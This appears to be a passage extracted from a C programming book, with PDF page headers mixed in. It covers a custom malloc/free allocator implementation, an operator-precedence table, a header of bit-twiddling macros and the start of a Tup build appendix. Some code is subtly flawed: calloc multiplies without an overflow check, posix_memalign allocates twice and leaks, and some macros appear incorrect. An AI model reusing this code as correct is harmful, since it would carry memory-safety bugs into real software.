#define l3ndx(ptr) getbits((uintptr_t)ptr, L3NDX, NL3BIT)
#if (PTRBITS > 48)
static struct mag *
findmag(void *ptr)
{
uintptr_t l1 = l1ndx(ptr);
uintptr_t l2 = l2ndx(ptr);
uintptr_t l3 = l3ndx(ptr);
void *ptr1;
void *ptr2;
struct mag *mag = NULL;
ptr1 = _mdir[l1];
if (ptr1) {
ptr2 = ((void **)ptr1)[l2];
if (ptr2) {
mag = ((struct mag **)ptr2)[l3];
}
}
return mag;
}
static void
addblk(void *ptr,
struct mag *mag)
{
24.2. IMPLEMENTATION 229
uintptr_t l1 = l1ndx(ptr);
uintptr_t l2 = l2ndx(ptr);
uintptr_t l3 = l3ndx(ptr);
void *ptr1;
void *ptr2;
void **pptr;
struct mag **item;
ptr1 = _mdir[l1];
if (!ptr1) {
_mdir[l1] = ptr1 = mapanon(_mapfd, NL2KEY * sizeof(void *));
if (ptr1 == MAP_FAILED) {
#ifdef ENOMEM
errno = ENOMEM;
#endif
exit(1);
}
}
pptr = ptr1;
ptr2 = pptr[l2];
if (!ptr2) {
pptr[l2] = ptr2 = mapanon(_mapfd, NL3KEY * sizeof(struct mag *));
if (ptr2 == MAP_FAILED) {
#ifdef ENOMEM
errno = ENOMEM;
#endif
exit(1);
}
}
item = &((struct mag **)ptr2)[l3];
*item = mag;
return;
}
#else
static struct mag *
findmag(void *ptr)
{
uintptr_t l1 = l1ndx(ptr);
uintptr_t l2 = l2ndx(ptr);
void *ptr1;
struct mag *mag = NULL;
ptr1 = _mdir[l1];
if (ptr1) {
mag = ((struct mag **)ptr1)[l2];
}
230 CHAPTER 24. C LIBRARY ALLOCATOR
return mag;
}
static void
addblk(void *ptr,
struct mag *mag)
{
uintptr_t l1 = l1ndx(ptr);
uintptr_t l2 = l2ndx(ptr);
void *ptr1;
struct mag **item;
ptr1 = _mdir[l1];
if (!ptr1) {
_mdir[l1] = ptr1 = mapanon(_mapfd, NL2KEY * sizeof(struct mag *));
if (ptr1 == MAP_FAILED) {
#ifdef ENOMEM
errno = ENOMEM;
#endif
exit(1);
}
}
item = &((struct mag **)ptr1)[l2];
*item = mag;
return;
}
#endif
#else
#define findmag(ptr) (_mdir[slabid(ptr)])
#define addblk(ptr, mag) (_mdir[slabid(ptr)] = (mag))
#endif
#endif
static struct mag *
gethdr(long aid)
{
struct arn *arn;
long cur;
struct mag **hbuf;
struct mag *mag = NULL;
uint8_t *ptr;
arn = _atab[aid];
hbuf = arn->htab;
if (!arn->nhdr) {
hbuf = mapanon(_mapfd, roundup2(NBUFHDR * sizeof(void *), PAGESIZE));
if (hbuf != MAP_FAILED) {
#if (INTSTAT)
24.2. IMPLEMENTATION 231
nhdrbytes[aid] += roundup2(NBUFHDR * sizeof(void *), PAGESIZE);
#endif
arn->htab = hbuf;
arn->hcur = NBUFHDR;
arn->nhdr = NBUFHDR;
}
}
cur = arn->hcur;
if (gte2(cur, NBUFHDR)) {
mag = mapanon(_mapfd, roundup2(NBUFHDR * nbhdr(), PAGESIZE));
if (mag == MAP_FAILED) {
#ifdef ENOMEM
errno = ENOMEM;
#endif
return NULL;
} else {
#if (VALGRIND)
if (RUNNING_ON_VALGRIND) {
VALGRIND_MALLOCLIKE_BLOCK(mag, PAGESIZE, 0, 0);
}
#endif
}
ptr = (uint8_t *)mag;
while (cur) {
mag = (struct mag *)ptr;
*hbuf++ = mag;
mag->bptr = mag->stk;
cur--;
ptr += nbhdr();
}
}
hbuf = arn->htab;
#if (SYSDBG)
_nhbuf++;
#endif
mag = hbuf[cur++];
arn->hcur = cur;
return mag;
}
#if (TUNEBUF)
static void
tunebuf(long val)
{
static long tunesz = 0;
long nb = _nbheap + _nbmap;
return;
232 CHAPTER 24. C LIBRARY ALLOCATOR
if (!tunesz) {
tunesz = val;
}
if (val == 64 && nb >= 64 * 1024) {
nmagslablog2up(nmagslablog2m64, val, nb);
} else if (val == 128 && nb >= 128 * 1024) {
nmagslablog2up(nmagslablog2m128, val, nb);
} else if (val == 256 && nb >= 256 * 1024) {
nmagslablog2up(nmagslablog2m256, val, nb);
} else if (val == 512 && nb >= 512 * 1024) {
nmagslablog2up(nmagslablog2m512, val, nb);
}
return;
}
#endif
static void *
getslab(long aid,
long bid)
{
uint8_t *ptr = NULL;
long nb = nbmag(bid);
#if (TUNEBUF)
unsigned long tmp;
static long tunesz = 0;
#endif
if (!ismapbkt(bid)) {
mlk(&_conf.heaplk);
ptr = growheap(nb);
munlk(&_conf.heaplk);
if (ptr != SBRK_FAILED) {
#if (INTSTAT)
nheapbytes[aid] += nb;
#endif
#if (TUNEBUF)
_nbheap += nb;
#if (STAT)
_nheapreq[bid]++;
#endif
#endif
}
} else {
ptr = mapanon(_mapfd, nbmap(bid));
if (ptr != MAP_FAILED) {
#if (INTSTAT)
nmapbytes[aid] += nbmap(bid);
#endif
24.2. IMPLEMENTATION 233
#if (STAT)
_nmapreq[bid]++;
#endif
}
}
#if (TUNEBUF)
if (ptr != MAP_FAILED && ptr != SBRK_FAILED) {
tmp = _nbmap + _nbheap;
if (!tunesz) {
tunesz = 64;
}
if ((tmp >> 10) >= tunesz) {
tunebuf(tunesz);
}
}
#endif
return ptr;
}
static void
freemap(struct mag *mag)
{
struct arn *arn;
long cur;
long aid = mag->aid;
long bid = mag->bid;
long bsz = blksz(bid);
long max = mag->max;
struct mag **hbuf;
arn = _atab[aid];
mlk(&arn->lktab[bid]);
cur = arn->hcur;
hbuf = arn->htab;
//#if (HACKS)
// if (!cur || _fcnt[bid] < 4) {
//#else
if (!cur) {
//#endif
mag->prev = NULL;
mlk(&_flktab[bid]);
mag->next = _ftab[bid];
_ftab[bid] = mag;
#if (HACKS)
_fcnt[bid]++;
#endif
munlk(&_flktab[bid]);
} else {
if (!unmapanon(clrptr(mag->adr), max * bsz)) {
234 CHAPTER 24. C LIBRARY ALLOCATOR
#if (VALGRIND)
if (RUNNING_ON_VALGRIND) {
VALGRIND_FREELIKE_BLOCK(clrptr(mag->adr), 0);
}
#endif
#if (INTSTAT)
nmapbytes[aid] -= max * bsz;
#endif
#if (TUNEBUF)
_nbmap -= max * bsz;
#endif
if (gt2(max, 1)) {
if (!istk(bid)) {
#if (INTSTAT)
nstkbytes[aid] -= (mag->max << 1) << sizeof(void *);
#endif
unmapstk(mag);
mag->bptr = NULL;
#if (VALGRIND)
if (RUNNING_ON_VALGRIND) {
VALGRIND_FREELIKE_BLOCK(mag, 0);
}
#endif
}
}
mag->adr = NULL;
hbuf[--cur] = mag;
arn->hcur = cur;
}
}
munlk(&arn->lktab[bid]);
return;
}
#define blkalnsz(sz, aln) \
(((aln) <= MINSZ) \
? max(sz, aln) \
: (sz) + (aln))
static void *
getmem(size_t size,
size_t align,
long zero)
{
struct arn *arn;
long aid;
long sz = blkalnsz(max(size, MINSZ), align);
long bid = bktid(sz);
uint8_t *retptr = NULL;
long bsz = blksz(bid);
24.2. IMPLEMENTATION 235
uint8_t *ptr = NULL;
long max = nblk(bid);
struct mag *mag = NULL;
void **stk;
long l;
long n;
long get = 0;
if (!(_conf.flags & CONF_INIT)) {
initmall();
}
aid = thrid();
arn = _atab[aid];
mlk(&arn->lktab[bid]);
mag = arn->btab[bid];
if (!mag) {
mag = arn->ftab[bid];
}
if (!mag) {
mlk(&_flktab[bid]);
mag = _ftab[bid];
if (mag) {
mag->aid = aid;
_ftab[bid] = mag->next;
mag->next = NULL;
#if (HACKS)
_fcnt[bid]--;
#endif
}
munlk(&_flktab[bid]);
if (mag) {
if (gt2(max, 1)) {
mag->next = arn->btab[bid];
if (mag->next) {
mag->next->prev = mag;
}
arn->btab[bid] = mag;
}
}
} else if (mag->cur == mag->max - 1) {
if (mag->next) {
mag->next->prev = NULL;
}
arn->btab[bid] = mag->next;
mag->next = NULL;
}
if (!mag) {
get = 1;
if (!ismapbkt(bid)) {
236 CHAPTER 24. C LIBRARY ALLOCATOR
ptr = getslab(aid, bid);
if (ptr == (void *)-1L) {
ptr = NULL;
}
} else {
ptr = mapanon(_mapfd, nbmap(bid));
if (ptr == MAP_FAILED) {
ptr = NULL;
}
#if (INTSTAT)
else {
nmapbytes[aid] += nbmap(bid);
}
#endif
}
mag = gethdr(aid);
if (mag) {
mag->aid = aid;
mag->cur = 0;
mag->max = max;
mag->bid = bid;
mag->adr = ptr;
if (ptr) {
if (gt2(max, 1)) {
if (istk(bid)) {
stk = (void **)mag->stk;
} else {
stk = mapstk(max);
}
mag->bptr = stk;
if (stk != MAP_FAILED) {
#if (INTSTAT)
nstkbytes[aid] += (max << 1) << sizeof(void *);
#endif
#if (VALGRIND)
if (RUNNING_ON_VALGRIND) {
VALGRIND_MALLOCLIKE_BLOCK(stk, max * sizeof(void *), 0, 0);
}
#endif
n = max << nmagslablog2(bid);
for (l = 0 ; l < n ; l++) {
stk[l] = ptr;
ptr += bsz;
}
mag->prev = NULL;
if (ismapbkt(bid)) {
mlk(&_flktab[bid]);
mag->next = _ftab[bid];
_ftab[bid] = mag;
#if (HACKS)
24.2. IMPLEMENTATION 237
_fcnt[bid]++;
#endif
} else {
mag->next = arn->btab[bid];
if (mag->next) {
mag->next->prev = mag;
}
arn->btab[bid] = mag;
}
}
}
}
}
}
if (mag) {
ptr = getblk(mag);
retptr = clrptr(ptr);
#if (VALGRIND)
if (RUNNING_ON_VALGRIND) {
if (retptr) {
VALGRIND_MALLOCLIKE_BLOCK(retptr, bsz, 0, 0);
}
}
#endif
if ((zero) && chkflg(ptr, BDIRTY)) {
zeroblk(retptr, bsz);
}
ptr = retptr;
#if (RZSZ)
markred(ptr);
markred(ptr + RZSZ + size);
#endif
if (retptr) {
#if (RZSZ)
retptr = ptr + RZSZ;
#endif
if (align) {
if ((uintptr_t)(retptr) & (align - 1)) {
retptr = (uint8_t *)roundup2((uintptr_t)ptr, align);
}
ptr = setflg(retptr, BALIGN);
}
putptr(mag, retptr, ptr);
addblk(retptr, mag);
}
}
if ((get) && ismapbkt(bid)) {
munlk(&_flktab[bid]);
}
munlk(&arn->lktab[bid]);
238 CHAPTER 24. C LIBRARY ALLOCATOR
#if (X11VIS)
// mlk(&x11vislk);
if (x11visinit) {
// ptr = clrptr(ptr);
ptr = retptr;
if (ptr) {
long l = blksz(bid) >> BLKMINLOG2;
uint8_t *vptr = ptr;
while (l--) {
x11vismarkres(vptr);
vptr += MINSZ;
}
}
if (retptr) {
long l = sz >> BLKMINLOG2;
uint8_t *vptr = retptr;
while (l--) {
x11vismarkused(ptr);
vptr += MINSZ;
}
}
XSetWindowBackgroundPixmap(x11visdisp,
x11viswin,
x11vispmap);
XClearWindow(x11visdisp,
x11viswin);
XFlush(x11visdisp);
}
// munlk(&x11vislk);
#endif
#ifdef ENOMEM
if (!retptr) {
errno = ENOMEM;
fprintf(stderr, "%lx failed to allocate %ld bytes\n", aid, 1UL << bid);
abort();
}
#if (INTSTAT)
else {
nalloc[aid][bid]++;
}
#endif
#endif
return retptr;
}
static void
24.2. IMPLEMENTATION 239
putmem(void *ptr)
{
#if (RZSZ)
uint8_t *u8p = ptr;
#endif
struct arn *arn;
void *mptr;
struct mag *mag = (ptr) ? findmag(ptr) : NULL;
long aid = -1;
long tid = thrid();
long bid = -1;
long max;
long glob = 0;
long freed = 0;
if (mag) {
#if (VALGRIND)
if (RUNNING_ON_VALGRIND) {
VALGRIND_FREELIKE_BLOCK(ptr, 0);
}
#endif
aid = mag->aid;
if (aid < 0) {
glob++;
mag->aid = aid = tid;
}
bid = mag->bid;
max = mag->max;
arn = _atab[aid];
mlk(&arn->lktab[bid]);
if (gt2(max, 1) && magempty(mag)) {
mag->next = arn->btab[bid];
if (mag->next) {
mag->next->prev = mag;
}
arn->btab[bid] = mag;
}
mptr = getptr(mag, ptr);
#if (RZSZ)
if (!chkflg(mptr, BALIGN)) {
u8p = mptr - RZSZ;
if (chkred(u8p) || chkred(u8p + blksz(bid) - RZSZ)) {
fprintf(stderr, "red-zone violation\n");
}
ptr = clrptr(mptr);
}
#endif
if (mptr) {
putptr(mag, ptr, NULL);
mptr = setflg(mptr, BDIRTY);
240 CHAPTER 24. C LIBRARY ALLOCATOR
putblk(mag, mptr);
if (magfull(mag)) {
if (gt2(max, 1)) {
if (mag->prev) {
mag->prev->next = mag->next;
} else {
arn->btab[bid] = mag->next;
}
if (mag->next) {
mag->next->prev = mag->prev;
}
}
if (!isbufbkt(bid) && ismapbkt(bid)) {
freed = 1;
} else {
mag->prev = mag->next = NULL;
mlk(&_flktab[bid]);
mag->next = _ftab[bid];
_ftab[bid] = mag;
#if (HACKS)
_fcnt[bid]++;
#endif
munlk(&_flktab[bid]);
}
}
}
munlk(&arn->lktab[bid]);
if (freed) {
freemap(mag);
}
#if (X11VIS)
// mlk(&x11vislk);
if (x11visinit) {
ptr = mptr;
if (ptr) {
if (freed) {
long l = nbmap(bid) >> BLKMINLOG2;
uint8_t *vptr = ptr;
while (l--) {
x11vismarkfreed(vptr);
vptr += MINSZ;
}
} else {
long l = blksz(bid) >> BLKMINLOG2;
uint8_t *vptr = ptr;
while (l--) {
x11vismarkfreed(vptr);
vptr += MINSZ;
24.2. IMPLEMENTATION 241
}
}
}
XSetWindowBackgroundPixmap(x11visdisp,
x11viswin,
x11vispmap);
XClearWindow(x11visdisp,
x11viswin);
XFlush(x11visdisp);
}
// munlk(&x11vislk);
#endif
}
return;
}
/* STD: ISO/POSIX */
void *
malloc(size_t size)
{
void *ptr = getmem(size, 0, 0);
return ptr;
}
void *
calloc(size_t n, size_t size)
{
size_t sz = n * (size + (RZSZ << 1));
void *ptr = getmem(sz, 0, 1);
return ptr;
}
void *
_realloc(void *ptr,
size_t size,
long rel)
{
void *retptr = ptr;
long sz = blkalnsz(max(size + (RZSZ << 1), MINSZ), 0);
struct mag *mag = (ptr) ? findmag(ptr) : NULL;
long bid = bktid(sz);
uintptr_t bsz = (mag) ? blksz(mag->bid) : 0;
if (!ptr) {
retptr = getmem(size, 0, 0);
} else if ((mag) && mag->bid != bid) {
242 CHAPTER 24. C LIBRARY ALLOCATOR
retptr = getmem(size, 0, 0);
if (retptr) {
memcpy(retptr, ptr, min(sz, bsz));
putmem(ptr);
ptr = NULL;
}
}
if ((rel) && (ptr)) {
putmem(ptr);
}
return retptr;
}
void *
realloc(void *ptr,
size_t size)
{
void *retptr = _realloc(ptr, size, 0);
return retptr;
}
void
free(void *ptr)
{
if (ptr) {
putmem(ptr);
}
return;
}
#if (_ISOC11_SOURCE)
void *
aligned_alloc(size_t align,
size_t size)
{
void *ptr = NULL;
if (!powerof2(align) || (size % align)) {
errno = EINVAL;
} else {
ptr = getmem(size, align, 0);
}
return ptr;
}
#endif
24.2. IMPLEMENTATION 243
#if (_POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600)
int
posix_memalign(void **ret,
size_t align,
size_t size)
{
void *ptr = getmem(size, align, 0);
int retval = -1;
if (!powerof2(align) || (size % sizeof(void *))) {
errno = EINVAL;
} else {
ptr = getmem(size, align, 0);
if (ptr) {
retval ^= retval;
}
}
*ret = ptr;
return retval;
}
#endif
/* STD: UNIX */
#if ((_BSD_SOURCE) \
|| (_XOPEN_SOURCE >= 500 || ((_XOPEN_SOURCE) && (_XOPEN_SOURCE_EXTENDED))) \
&& !(_POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600))
void *
valloc(size_t size)
{
void *ptr = getmem(size, PAGESIZE, 0);
return ptr;
}
#endif
void *
memalign(size_t align,
size_t size)
{
void *ptr = NULL;
if (!powerof2(align)) {
errno = EINVAL;
} else {
ptr = getmem(size, align, 0);
}
244 CHAPTER 24. C LIBRARY ALLOCATOR
return ptr;
}
#if (_BSD_SOURCE)
void *
reallocf(void *ptr,
size_t size)
{
void *retptr = _realloc(ptr, size, 1);
return retptr;
}
#endif
#if (_GNU_SOURCE)
void *
pvalloc(size_t size)
{
size_t sz = roundup2(size, PAGESIZE);
void *ptr = getmem(sz, PAGESIZE, 0);
return ptr;
}
#endif
void
cfree(void *ptr)
{
if (ptr) {
free(ptr);
}
return;
}
size_t
malloc_usable_size(void *ptr)
{
struct mag *mag = findmag(ptr);
size_t sz = usrsz(mag->bid);
return sz;
}
size_t
malloc_good_size(size_t size)
{
size_t rzsz = RZSZ;
size_t sz = usrsz(bktid(size)) - (rzsz << 1);
24.2. IMPLEMENTATION 245
return sz;
}
size_t
malloc_size(void *ptr)
{
struct mag *mag = findmag(ptr);
size_t sz = (mag) ? blksz(mag->bid) : 0;
return sz;
}
246 CHAPTER 24. C LIBRARY ALLOCATOR
Appendix A
Cheat Sheets
247
248 APPENDIX A. CHEAT SHEETS
A.1 C Operator Precedence and Associativity
Precedence
The table below lists operators in descending order of evaluation (precedence).
Operators Associativity
() [] -> . left to right
!  ̃ + + - - + - * (cast) sizeof right to left
* / % left to right
+ - left to right
<< >> left to right
< <= > >= left to right
== != left to right
& left to right
^ left to right
| left to right
&& left to right
?: right to left
= += -= *= /= %= &= ^= |= <<= >>= right to left
, left to right
Notes
Unary (single operand) +, -, and * have higher precedence than the binary ones
TODO: (ARM?) assembly, Dijkstra’s Shunting yard, cdecl
Appendix B
A Bag of Tricks
trix.h
#ifndef __ZERO_TRIX_H__
#define __ZERO_TRIX_H__
/*
* this file contains tricks I've gathered together from sources such as MIT
* HAKMEM and the book Hacker's Delight
*/
#define ZEROABS 1
#include <stdint.h>
#include <limits.h>
#include <zero/param.h>
#if (LONGSIZE == 4)
#define tzerol(u, r) tzero32(u, r)
#define lzerol(u, r) lzero32(u, r)
#elif (LONGSIZE == 8)
#define tzerol(u, r) tzero64(u, r)
#define lzerol(u, r) lzero64(u, r)
#endif
/* get the lowest 1-bit in a */
#define lo1bit(a) ((a) & -(a))
/* get n lowest and highest bits of i */
#define lobits(i, n) ((i) & ((1U << (n)) - 0x01))
#define hibits(i, n) ((i) & ~((1U << (sizeof(i) * CHAR_BIT - (n))) - 0x01))
/* get n bits starting from index j */
#define getbits(i, j, n) (lobits((i) >> (j), (n)))
/* set n bits starting from index j to value b */
#define setbits(i, j, n, b) ((i) |= (((b) << (j)) & ~(((1U << (n)) << (j)) - 0x01)))
#define bitset(p, b) (((uint8_t *)(p))[(b) >> 3] & (1U << ((b) & 0x07)))
249
250 APPENDIX B. A BAG OF TRICKS
/* set bit # b in *p */
#define setbit(p, b) (((uint8_t *)(p))[(b) >> 3] |= (1U << ((b) & 0x07)))
/* clear bit # b in *p */
#define clrbit(p, b) (((uint8_t *)(p))[(b) >> 3] &= ~(1U << ((b) & 0x07)))
/* m - mask of bits to be taken from b. */
#define mergebits(a, b, m) ((a) ^ (((a) ^ (b)) & (m)))
/* m - mask of bits to be copied from a. 1 -> copy, 0 -> leave alone. */
#define copybits(a, b, m) (((a) | (m)) | ((b) & ~(m)))
/* compute minimum and maximum of a and b without branching */
#define min(a, b) \
((b) + (((a) - (b)) & -((a) < (b))))
#define max(a, b) \
((a) - (((a) - (b)) & -((a) < (b))))
/* compare with power-of-two p2 */
#define gt2(u, p2) /* true if u > p2 */ \
((u) & ~(p2))
#define gte2(u, p2) /* true if u >= p2 */ \
((u) & -(p2))
/* swap a and b without a temporary variable */
#define swap(a, b) ((a) ^= (b), (b) ^= (a), (a) ^= (b))
/* compute absolute value of integer without branching; PATENTED in USA :( */
#if (ZEROABS)
#define zeroabs(a) \
(((a) ^ (((a) >> (CHAR_BIT * sizeof(a) - 1)))) \
- ((a) >> (CHAR_BIT * sizeof(a) - 1)))
#define abs(a) zeroabs(a)
#define labs(a) zeroabs(a)
#define llabs(a) zeroabs(a)
#endif
/* true if x is a power of two */
#define powerof2(x) (!((x) & ((x) - 1)))
/* align a to boundary of (the power of two) b2. */
//#define align(a, b2) ((a) & ~((b2) - 1))
//#define align(a, b2) ((a) & -(b2))
#define mod2(a, b2) ((a) & ((b2) - 1))
/* round a up to the next multiple of (the power of two) b2. */
//#define roundup2a(a, b2) (((a) + ((b2) - 0x01)) & ~((b2) + 0x01))
#define roundup2(a, b2) (((a) + ((b2) - 0x01)) & -(b2))
/* round down to the previous multiple of (the power of two) b2 */
#define rounddown2(a, b2) ((a) & ~((b2) - 0x01))
/* compute the average of a and b without division */
#define uavg(a, b) (((a) & (b)) + (((a) ^ (b)) >> 1))
#define divceil(a, b) (((a) + (b) - 1) / (b))
#define divround(a, b) (((a) + ((b) / 2)) / (b))
251
#define haszero_2(a) (~(a))
#define haszero_32(a) (((a) - 0x01010101) & ~(a) & 0x80808080)
#define onebits_32(u32, r) \
((r) = (u32), \
(r) -= ((r) >> 1) & 0x55555555, \
(r) = (((r) >> 2) & 0x33333333) + ((r) & 0x33333333), \
(r) = ((((r) >> 4) + (r)) & 0x0f0f0f0f), \
(r) += ((r) >> 8), \
(r) += ((r) >> 16), \
(r) &= 0x3f)
#define onebits_32b(u32, r) \
((r) = (u32), \
(r) -= ((r) >> 1) & 0x55555555, \
(r) = (((r) >> 2) & 0x33333333) + ((r) & 0x33333333), \
(r) = (((((r) >> 4) + (r)) & 0x0f0f0f0f) * 0x01010101) >> 24)
#define bytepar(b, r) \
do { \
unsigned long _tmp1; \
\
_tmp1 = (b); \
_tmp1 ^= (b) >> 4; \
(r) = (0x6996 >> (_tmp1 & 0x0f)) & 0x01; \
} while (0)
#define bytepar2(b, r) \
do { \
unsigned long _tmp1; \
unsigned long _tmp2; \
\
_tmp1 = _tmp2 = (b); \
_tmp2 >>= 4; \
_tmp1 ^= _tmp2; \
_tmp2 = 0x6996; \
(r) = (_tmp2 >> (_tmp1 & 0x0f)) & 0x01; \
} while (0)
#define bytepar3(b) ((0x6996 >> (((b) ^ ((b) >> 4)) & 0x0f)) & 0x01)
/* count number of trailing zero-bits in u32 */
#define tzero32(u32, r) \
do { \
uint32_t __tmp; \
uint32_t __mask; \
\
(r) = 0; \
__tmp = (u32); \
__mask = 0x01; \
if (!(__tmp & __mask)) { \
__mask = 0xffff; \
252 APPENDIX B. A BAG OF TRICKS
if (!(__tmp & __mask)) { \
__tmp >>= 16; \
(r) += 16; \
} \
__mask >>= 8; \
if (!(__tmp & __mask)) { \
__tmp >>= 8; \
(r) += 8; \
} \
__mask >>= 4; \
if (!(__tmp & __mask)) { \
__tmp >>= 4; \
(r) += 4; \
} \
__mask >>= 2; \
if (!(__tmp & __mask)) { \
__tmp >>= 2; \
(r) += 2; \
} \
__mask >>= 1; \
if (!(__tmp & __mask)) { \
(r) += 1; \
} \
} \
} while (0)
/*
* count number of leading zero-bits in u32
*/
#if 0
#define lzero32(u32, r) \
((u32) |= ((u32) >> 1), \
(u32) |= ((u32) >> 2), \
(u32) |= ((u32) >> 4), \
(u32) |= ((u32) >> 8), \
(u32) |= ((u32) >> 16), \
CHAR_BIT * sizeof(u32) - onebits_32(u32, r))
#endif
#define lzero32(u32, r) \
do { \
uint32_t __tmp; \
uint32_t __mask; \
\
(r) = 0; \
__tmp = (u32); \
__mask = 0x01; \
__mask <<= CHAR_BIT * sizeof(uint32_t) - 1; \
if (!(__tmp & __mask)) { \
__mask = 0xffffffff; \
__mask <<= 16; \
253
if (!(__tmp & __mask)) { \
__tmp <<= 16; \
(r) += 16; \
} \
__mask <<= 8; \
if (!(__tmp & __mask)) { \
__tmp <<= 8; \
(r) += 8; \
} \
__mask <<= 4; \
if (!(__tmp & __mask)) { \
__tmp <<= 4; \
(r) += 4; \
} \
__mask <<= 2; \
if (!(__tmp & __mask)) { \
__tmp <<= 2; \
(r) += 2; \
} \
__mask <<= 1; \
if (!(__tmp & __mask)) { \
(r)++; \
} \
} \
} while (0)
/* 64-bit versions */
#define tzero64(u64, r) \
do { \
uint64_t __tmp; \
uint64_t __mask; \
\
(r) = 0; \
__tmp = (u64); \
__mask = 0x01; \
if (!(__tmp & __mask)) { \
__mask = 0xffffffff; \
if (!(__tmp & __mask)) { \
__tmp >>= 32; \
(r) += 32; \
} \
__mask >>= 16; \
if (!(__tmp & __mask)) { \
__tmp >>= 16; \
(r) += 16; \
} \
__mask >>= 8; \
if (!(__tmp & __mask)) { \
__tmp >>= 8; \
254 APPENDIX B. A BAG OF TRICKS
(r) += 8; \
} \
__mask >>= 4; \
if (!(__tmp & __mask)) { \
__tmp >>= 4; \
(r) += 4; \
} \
__mask >>= 2; \
if (!(__tmp & __mask)) { \
__tmp >>= 2; \
(r) += 2; \
} \
__mask >>= 1; \
if (!(__tmp & __mask)) { \
(r) += 1; \
} \
} \
} while (0)
#define lzero64(u64, r) \
do { \
uint64_t __tmp; \
uint64_t __mask; \
\
(r) = 0; \
__tmp = (u64); \
__mask = 0x01; \
__mask <<= CHAR_BIT * sizeof(uint64_t) - 1; \
if (!(__tmp & __mask)) { \
__mask = 0xffffffff; \
__mask <<= 32; \
if (!(__tmp & __mask)) { \
__tmp <<= 32; \
(r) += 32; \
} \
__mask <<= 16; \
if (!(__tmp & __mask)) { \
__tmp <<= 16; \
(r) += 16; \
} \
__mask <<= 8; \
if (!(__tmp & __mask)) { \
__tmp <<= 8; \
(r) += 8; \
} \
__mask <<= 4; \
if (!(__tmp & __mask)) { \
__tmp <<= 4; \
(r) += 4; \
} \
255
__mask <<= 2; \
if (!(__tmp & __mask)) { \
__tmp <<= 2; \
(r) += 2; \
} \
__mask <<= 1; \
if (!(__tmp & __mask)) { \
(r)++; \
} \
} \
} while (0)
static __inline__ uint32_t
ceil2_32(uint64_t x)
{
x--;
x |= x >> 1;
x |= x >> 2;
x |= x >> 4;
x |= x >> 8;
x |= x >> 16;
x++;
return x;
}
static __inline__ uint64_t
ceil2_64(uint64_t x)
{
x--;
x |= x >> 1;
x |= x >> 2;
x |= x >> 4;
x |= x >> 8;
x |= x >> 16;
x |= x >> 32;
x++;
return x;
}
/* internal macros. */
#define _ftoi32(f) (*((int32_t *)&(f)))
#define _ftou32(f) (*((uint32_t *)&(f)))
#define _dtoi64(d) (*((int64_t *)&(d)))
#define _dtou64(d) (*((uint64_t *)&(d)))
/* FIXME: little-endian. */
#define _dtohi32(d) (*(((uint32_t *)&(d)) + 1))
/*
* IEEE 32-bit
256 APPENDIX B. A BAG OF TRICKS
* 0..22 - mantissa
* 23..30 - exponent
* 31 - sign
*/
/* convert elements of float to integer. */
#define fgetmant(f) (_ftou32(f) & 0x007fffff)
#define fgetexp(f) ((_ftou32(f) >> 23) & 0xff)
#define fgetsign(f) (_ftou32(f) >> 31)
#define fsetmant(f, mant) (_ftou32(f) |= (mant) & 0x007fffff)
#define fsetexp(f, exp) (_ftou32(f) |= ((exp) & 0xff) << 23)
#define fsetsign(f) (_ftou32(f) | 0x80000000)
/*
* IEEE 64-bit
* 0..51 - mantissa
* 52..62 - exponent
* 63 - sign
*/
/* convert elements of double to integer. */
#define dgetmant(d) (_dtou64(d) & UINT64_C(0x000fffffffffffff))
#define dgetexp(d) ((_dtohi32(d) >> 20) & 0x7ff)
#define dgetsign(d) (_dtohi32(d) >> 31)
#define dsetmant(d, mant) \
(*((uint64_t *)&(d)) |= (uint64_t)(mant) | UINT64_C(0x000fffffffffffff))
#define dsetexp(d, exp) \
(*((uint64_t *)&(d)) |= (((uint64_t)((exp) & 0x7ff)) << 52))
#define dsetsign(d) \
(*((uint64_t *)&(d)) |= UINT64_C(0x8000000000000000))
/*
* IEEE 80-bit
* 0..63 - mantissa
* 64..78 - exponent
* 79 - sign
*/
#define ldgetmant(ld) (*((uint64_t *)&ld))
#define ldgetexp(ld) (*((uint32_t *)&ld + 2) & 0x7fff)
#define ldgetsign(ld) (*((uint32_t *)&ld + 3) & 0x8000)
#define ldsetmant(ld, mant) (*((uint64_t *)&ld = (mant)))
#define ldsetexp(ld, exp) (*((uint32_t *)&ld + 2) |= (exp) & 0x7fff)
#define ldsetsign(ld) (*((uint32_t *)&ld + 3) |= 0x80000000)
/* sign bit 0x8000000000000000. */
#define ifabs(d) \
(_dtou64(d) & UINT64_C(0x7fffffffffffffff))
#define fabs2(d, t64) \
(*((uint64_t *)&(t64)) = ifabs(d))
/* sign bit 0x80000000. */
#define ifabsf(f) \
(_ftou32(f) & 0x7fffffff)
257
/* TODO: test the stuff below. */
/* (a < b) ? v1 : v2; */
#define condltset(a, b, v1, v2) \
(((((a) - (b)) >> (CHAR_BIT * sizeof(a) - 1)) & ((v1) ^ (v2))) ^ (v2))
/* c - conditional, f - flag, u - word */
#define condsetf(c, f, u) ((u) ^ ((-(u) ^ (u)) & (f)))
#define nextp2(a) \
(((a) \
| ((a) >> 1) \
| ((a) >> 2) \
| ((a) >> 4) \
| ((a) >> 8) \
| ((a) >> 16)) + 1)
/* (a < b) ? v1 : v2; */
#define condset(a, b, v1, v2) \
(((((a) - (b)) >> (CHAR_BIT * sizeof(a) - 1)) & ((v1) ^ (v2))) ^ (v2))
/* c - conditional, f - flag, u - word */
#define condsetf(c, f, u) ((u) ^ ((-(u) ^ (u)) & (f)))
#define sat8(x) \
((x) | (!((x) >> 8) - 1))
#define sat8b(x) \
condset(x, 0xff, x, 0xff)
#define haszero(a) (~(a))
#if 0
#define haszero_32(a) \
(~(((((a) & 0x7f7f7f7f) + 0x7f7f7f7f) | (a)) | 0x7f7f7f7f))
#endif
/* calculate modulus u % 10 */
#define modu10(u) \
((u) - ((((u) * 6554U) >> 16) * 10))
/* TODO: change modulus calculations to something faster */
#define leapyear(x) \
(!((x) & 0x03) && ((((x) % 100)) || !((x) % 400)))
#endif /* __ZERO_TRIX_H__ */
258 APPENDIX B. A BAG OF TRICKS
Appendix C
Managing Builds with Tup
Rationale
This chapter is not meant to be a be-all manual for Tup; instead, I give a somewhat-
quick overview in the hopes the readers will be able to get a jump-start for using Tup
for their projects.
Why Tup?
There are many tools around to manage the task of building software projects. Whereas
I have quite a bunch of experience with GNU Auto-tools and have been suggested
learning to use Cmake, I was recently pointed to Tup; it was basically love at first
sight.
C.1 Overview
Tup Initialisation
